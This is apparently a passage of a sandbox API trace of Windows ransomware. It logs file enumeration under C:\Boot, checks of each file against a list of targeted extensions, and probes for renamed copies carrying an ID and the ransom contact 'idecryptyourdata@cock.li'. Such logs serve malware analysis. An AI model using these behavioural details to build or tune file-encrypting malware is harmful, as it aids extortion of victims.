RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddf28 [0178.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x4049020 [0178.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddf40 [0178.084] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddf40, Size=0x20) returned 0x6beea8 [0178.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddf40 [0178.084] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddf40, Size=0x20) returned 0x6bef48 [0178.084] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.084] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.084] Wow64DisableWow64FsRedirection (in: OldValue=0x361ff50 | out: OldValue=0x361ff50*=0x0) returned 1 [0178.084] lstrlenW (lpString="kernel32.dll") returned 12 [0178.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0178.084] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0178.084] Sleep (dwMilliseconds=0x64) [0178.308] lstrcmpiW (lpString1=".MARKER", lpString2=".bat") returned 1 [0178.308] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0178.308] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0178.311] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=0) returned 1 [0178.312] CloseHandle (hObject=0x304) returned 1 [0178.312] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.312] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.312] lstrlenW (lpString=".doc") returned 4 [0178.312] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0178.312] lstrlenW (lpString=".docx") returned 5 [0178.312] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0178.312] lstrlenW (lpString=".pdf") returned 4 [0178.312] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0178.312] lstrlenW (lpString=".xls") returned 4 [0178.312] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0178.312] lstrlenW (lpString=".xlsx") returned 5 [0178.312] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0178.312] lstrlenW (lpString=".ppt") returned 4 [0178.312] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0178.312] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.312] lstrlenW (lpString=".zip") returned 4 [0178.312] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0178.312] lstrlenW (lpString=".rar") returned 4 [0178.312] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0178.312] lstrlenW (lpString=".bz2") returned 4 [0178.312] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0178.312] lstrlenW (lpString=".7z") returned 3 [0178.312] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0178.312] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.312] lstrlenW (lpString=".dbf") returned 4 [0178.313] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0178.313] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.313] lstrlenW (lpString=".1cd") returned 4 [0178.313] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0178.313] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.313] lstrlenW (lpString=".jpg") returned 4 [0178.313] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0178.313] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.313] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.313] lstrlenW (lpString=".doc") returned 4 [0178.313] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0178.313] lstrlenW (lpString=".docx") returned 5 [0178.313] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0178.313] lstrlenW (lpString=".pdf") returned 4 [0178.313] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0178.313] lstrlenW (lpString=".xls") returned 4 [0178.313] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0178.313] lstrlenW (lpString=".xlsx") returned 5 [0178.313] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0178.313] lstrlenW (lpString=".ppt") returned 4 [0178.313] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0178.313] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.313] lstrlenW (lpString=".zip") returned 4 [0178.313] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0178.313] lstrlenW (lpString=".rar") returned 4 [0178.314] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0178.314] lstrlenW (lpString=".bz2") returned 4 [0178.314] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0178.314] lstrlenW (lpString=".7z") returned 3 [0178.314] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0178.314] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.314] lstrlenW (lpString=".dbf") returned 4 [0178.314] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0178.314] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.314] lstrlenW (lpString=".1cd") returned 4 [0178.314] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0178.314] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0178.314] lstrlenW (lpString=".jpg") returned 4 [0178.314] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0178.314] Sleep (dwMilliseconds=0x64) [0178.613] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0178.613] lstrlenW (lpString="memtest.exe.mui") returned 15 [0178.613] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.613] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=45984) returned 1 [0178.614] CloseHandle (hObject=0x348) returned 1 [0178.614] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui")) returned 0x20 [0178.614] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.614] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.614] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.614] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.614] lstrlenW (lpString=".doc") returned 4 [0178.614] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.614] lstrlenW (lpString=".docx") returned 5 [0178.614] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.614] lstrlenW (lpString=".pdf") returned 4 [0178.614] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.614] lstrlenW (lpString=".xls") returned 4 [0178.614] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.614] lstrlenW (lpString=".xlsx") returned 5 [0178.614] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.614] lstrlenW (lpString=".ppt") returned 4 [0178.614] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.615] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.615] lstrlenW (lpString=".zip") returned 4 [0178.615] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.615] lstrlenW (lpString=".rar") returned 4 [0178.615] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.615] lstrlenW (lpString=".bz2") returned 4 [0178.615] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.615] lstrlenW (lpString=".7z") returned 3 [0178.615] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.615] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.615] lstrlenW (lpString=".dbf") returned 4 [0178.615] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.615] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.615] lstrlenW (lpString=".1cd") returned 4 [0178.615] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.615] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.615] lstrlenW (lpString=".jpg") returned 4 [0178.615] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.615] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.615] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.615] lstrlenW (lpString=".doc") returned 4 [0178.615] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.615] lstrlenW (lpString=".docx") returned 5 [0178.615] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.615] lstrlenW (lpString=".pdf") returned 4 [0178.615] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.615] lstrlenW (lpString=".xls") returned 4 [0178.615] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.616] lstrlenW (lpString=".xlsx") returned 5 [0178.616] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.616] lstrlenW (lpString=".ppt") returned 4 [0178.616] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.616] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.616] lstrlenW (lpString=".zip") returned 4 [0178.616] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.616] lstrlenW (lpString=".rar") returned 4 [0178.616] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.616] lstrlenW (lpString=".bz2") returned 4 [0178.616] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.616] lstrlenW (lpString=".7z") returned 3 [0178.616] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.616] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.616] lstrlenW (lpString=".dbf") returned 4 [0178.616] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.616] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.616] lstrlenW (lpString=".1cd") returned 4 [0178.616] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.616] lstrlenW (lpString="C:\\Boot\\fr-FR\\memtest.exe.mui") returned 29 [0178.616] lstrlenW (lpString=".jpg") returned 4 [0178.616] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.616] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0178.617] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0178.617] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.617] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=76640) returned 1 [0178.617] CloseHandle (hObject=0x348) returned 1 [0178.617] GetFileAttributesW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui")) returned 0x20 [0178.617] GetFileAttributesW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.617] CreateFileW (lpFileName="C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.618] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.618] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.618] lstrlenW (lpString=".doc") returned 4 [0178.618] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.618] lstrlenW (lpString=".docx") returned 5 [0178.618] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.618] lstrlenW (lpString=".pdf") returned 4 [0178.618] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.618] lstrlenW (lpString=".xls") returned 4 [0178.618] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.618] lstrlenW (lpString=".xlsx") returned 5 [0178.618] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.618] lstrlenW (lpString=".ppt") returned 4 [0178.618] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.618] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.618] lstrlenW (lpString=".zip") returned 4 [0178.618] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.618] lstrlenW (lpString=".rar") returned 4 [0178.618] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.618] lstrlenW (lpString=".bz2") returned 4 [0178.618] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.618] lstrlenW (lpString=".7z") returned 3 [0178.618] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.618] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.619] lstrlenW (lpString=".dbf") returned 4 [0178.619] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.619] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.619] lstrlenW (lpString=".1cd") returned 4 [0178.619] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.619] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.619] lstrlenW (lpString=".jpg") returned 4 [0178.619] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.619] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.619] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.619] lstrlenW (lpString=".doc") returned 4 [0178.619] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.619] lstrlenW (lpString=".docx") returned 5 [0178.619] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.619] lstrlenW (lpString=".pdf") returned 4 [0178.619] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.619] lstrlenW (lpString=".xls") returned 4 [0178.619] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.619] lstrlenW (lpString=".xlsx") returned 5 [0178.619] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.620] lstrlenW (lpString=".ppt") returned 4 [0178.620] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.620] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.620] lstrlenW (lpString=".zip") returned 4 [0178.620] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.620] lstrlenW (lpString=".rar") returned 4 [0178.620] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.620] lstrlenW (lpString=".bz2") returned 4 [0178.620] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.620] lstrlenW (lpString=".7z") returned 3 [0178.620] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.620] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.620] lstrlenW (lpString=".dbf") returned 4 [0178.620] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.620] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.620] lstrlenW (lpString=".1cd") returned 4 [0178.620] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.620] lstrlenW (lpString="C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 29 [0178.620] lstrlenW (lpString=".jpg") returned 4 [0178.620] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.621] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0178.621] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0178.621] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.621] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=78688) returned 1 [0178.621] CloseHandle (hObject=0x348) returned 1 [0178.621] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0178.621] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.621] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.622] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.622] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.622] lstrlenW (lpString=".doc") returned 4 [0178.622] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.622] lstrlenW (lpString=".docx") returned 5 [0178.622] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.622] lstrlenW (lpString=".pdf") returned 4 [0178.622] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.622] lstrlenW (lpString=".xls") returned 4 [0178.622] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.622] lstrlenW (lpString=".xlsx") returned 5 [0178.622] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.622] lstrlenW (lpString=".ppt") returned 4 [0178.622] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.622] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.622] lstrlenW (lpString=".zip") returned 4 [0178.622] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.622] lstrlenW (lpString=".rar") returned 4 [0178.622] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.622] lstrlenW (lpString=".bz2") returned 4 [0178.622] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.622] lstrlenW (lpString=".7z") returned 3 [0178.622] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.623] lstrlenW (lpString=".dbf") returned 4 [0178.623] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.623] lstrlenW (lpString=".1cd") returned 4 [0178.623] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.623] lstrlenW (lpString=".jpg") returned 4 [0178.623] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.623] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.623] lstrlenW (lpString=".doc") returned 4 [0178.623] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.623] lstrlenW (lpString=".docx") returned 5 [0178.623] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.623] lstrlenW (lpString=".pdf") returned 4 [0178.623] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.623] lstrlenW (lpString=".xls") returned 4 [0178.623] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.623] lstrlenW (lpString=".xlsx") returned 5 [0178.623] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.624] lstrlenW (lpString=".ppt") returned 4 [0178.624] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.624] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.624] lstrlenW (lpString=".zip") returned 4 [0178.624] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.624] lstrlenW (lpString=".rar") returned 4 [0178.624] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.624] lstrlenW (lpString=".bz2") returned 4 [0178.624] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.624] lstrlenW (lpString=".7z") returned 3 [0178.624] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.624] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.624] lstrlenW (lpString=".dbf") returned 4 [0178.624] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.624] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.624] lstrlenW (lpString=".1cd") returned 4 [0178.624] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.624] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0178.624] lstrlenW (lpString=".jpg") returned 4 [0178.624] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.624] lstrcmpiW (lpString1=".mui", lpString2=".bat") returned 1 [0178.625] lstrlenW (lpString="memtest.exe.mui") returned 15 [0178.625] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0178.625] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x361ff14 | out: lpFileSize=0x361ff14*=45976) returned 1 [0178.625] CloseHandle (hObject=0x348) returned 1 [0178.625] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui")) returned 0x20 [0178.625] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0178.625] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\memtest.exe.mui" (normalized: "c:\\boot\\hu-hu\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0178.625] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.626] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.626] lstrlenW (lpString=".doc") returned 4 [0178.626] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.626] lstrlenW (lpString=".docx") returned 5 [0178.626] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.626] lstrlenW (lpString=".pdf") returned 4 [0178.626] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.626] lstrlenW (lpString=".xls") returned 4 [0178.626] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.626] lstrlenW (lpString=".xlsx") returned 5 [0178.626] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.626] lstrlenW (lpString=".ppt") returned 4 [0178.626] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.626] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.626] lstrlenW (lpString=".zip") returned 4 [0178.626] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.626] lstrlenW (lpString=".rar") returned 4 [0178.626] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0178.626] lstrlenW (lpString=".bz2") returned 4 [0178.626] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0178.626] lstrlenW (lpString=".7z") returned 3 [0178.626] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0178.626] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.626] lstrlenW (lpString=".dbf") returned 4 [0178.627] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0178.627] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.627] lstrlenW (lpString=".1cd") returned 4 [0178.627] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0178.627] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.627] lstrlenW (lpString=".jpg") returned 4 [0178.627] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0178.627] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.627] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.627] lstrlenW (lpString=".doc") returned 4 [0178.627] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0178.627] lstrlenW (lpString=".docx") returned 5 [0178.627] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0178.627] lstrlenW (lpString=".pdf") returned 4 [0178.627] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0178.627] lstrlenW (lpString=".xls") returned 4 [0178.628] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0178.628] lstrlenW (lpString=".xlsx") returned 5 [0178.628] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0178.628] lstrlenW (lpString=".ppt") returned 4 [0178.628] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0178.628] lstrlenW (lpString="C:\\Boot\\hu-HU\\memtest.exe.mui") returned 29 [0178.628] lstrlenW (lpString=".zip") returned 4 [0178.628] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0178.628] lstrlenW (lpString=".rar") returned 4 [0178.628] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 